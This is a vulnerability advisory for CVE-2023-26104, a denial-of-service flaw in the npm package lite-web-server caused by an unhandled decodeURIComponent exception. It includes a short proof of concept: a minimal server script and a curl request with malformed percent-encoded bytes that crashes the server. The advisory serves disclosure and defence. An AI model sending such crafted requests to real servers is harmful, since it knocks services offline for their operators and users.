Headline
CVE-2023-26104: Denial of Service in [email protected]
All versions of the package lite-web-server are vulnerable to Denial of Service (DoS) when an attacker sends an HTTP request and includes control characters that the decodeURI() function is unable to parse.
lite-web-server is an HTTP file server, and describes itself as The npm package to create simple web server.
Observation:
- Virtually zero downloads, so no considerable impact.
- It was last published 6 months ago, so can assume some level of maintenance exists.
Resources:
- Project’s GitHub source code: https://github.com/chasyumen/lite-web-server
- Project’s npm package: https://www.npmjs.com/package/lite-web-server
Background on exploitation
If an attacker makes an HTTP request to a server running with lite-web-server and includes control characters that the decodeURI() function is unable to parse, then it causes lite-web-server to crash.
The vulnerable code is line 274 of src/WebServer.js which doesn’t handle an exception thrown here:
var \_url \= decodeURIComponent(req.url).slice(1);
Proof of Concept exploit
- Install the package: npm install --save [email protected]
- Create a server.js to serve requests (see below)
- Ensure you have a ./public directory in the current project and have a file in there
- Send an HTTP request which uses unicode characters outside of the ASCII scope of URLs: curl http://10.100.102.7:3000/…%c0%2fetc%c0%2fhosts
- Observe the server crashes
server.js
var { WebServer } = require(“lite-web-server”); var server = new WebServer({ dir: “./public/” });
server.start();
Author
Liran Tal
Related news
All versions of the package lite-web-server are vulnerable to Denial of Service (DoS) when an attacker sends an HTTP request and includes control characters that the decodeURI() function is unable to parse.